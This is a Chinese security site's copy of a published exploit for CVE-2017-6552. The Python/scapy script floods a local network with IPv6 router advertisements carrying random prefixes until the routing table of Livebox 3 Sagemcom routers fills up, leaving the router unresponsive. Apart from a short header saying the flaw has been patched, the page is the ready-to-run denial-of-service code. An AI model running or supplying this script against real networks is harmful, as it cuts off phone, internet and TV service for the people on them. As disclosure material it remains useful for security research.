首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service
来源:http://www.orange.fr/ 作者:Olagne 发布时间:2017-03-10  
#!/usr/bin/python
 
# Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3
# Date: 09/03/2017
# Exploit Author: Quentin Olagne
# Vendor Homepage: http://www.orange.fr/
# Version: SG30_sip-fr-5.15.8.1
# Tested on: Livebox 3 - Sagemcom
# CVE : CVE-2017-6552
 
'''
Livebox router has its default IPv6 routing table max. size too
small and therefore can be filled within minutes.
An attacker can exploit this issue to render the affected system
unresponsive, resulting in a denial-of-service condition for Phone,
Internet and TV services.
 
Vulenrability has been discovered in April '16 and has been patched some time ago with the newest firmware.
I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin
livebox web UI, don't know if it's been implemented.
 
'''
 
from scapy.all import *
import time
import threading
 
start_time = time.time()
 
def printit():
    threading.Timer(5.0, printit).start()
    interval = time.time() - start_time
    print 'Total time in seconds:', interval, '\n'
 
printit()
 
packet = Ether() \
    /IPv6() \
    /ICMPv6ND_RA() \
    /ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \
    /ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42"))
 
try:
    sendp(packet,loop=1)
except KeyboardInterrupt:
        stored_exception=sys.exc_info()
except:
    pass
 
print "Goodbye"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Drupal 7.x Module Services - R
·Apache Struts 2.3.5 < 2.3.31 /
·USBPcap - Privilege Escalation
·ASUSWRT RT-AC53 (3.0.0.4.380.6
·Evostream Media Server 1.7.1 (
·FTP Voyager Scheduler 16.2.0 -
·Azure Data Expert Ultimate 2.2
·Wireless IP Camera (P2P) WIFIC
·Struts2 S2-045 Remote Command
·WatchGuard XTMv 11.12 Build 51
·Alienvault OSSIM / USM 5.3.0 A
·e107 <= 2.1.4 - 'keyword' Blin
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved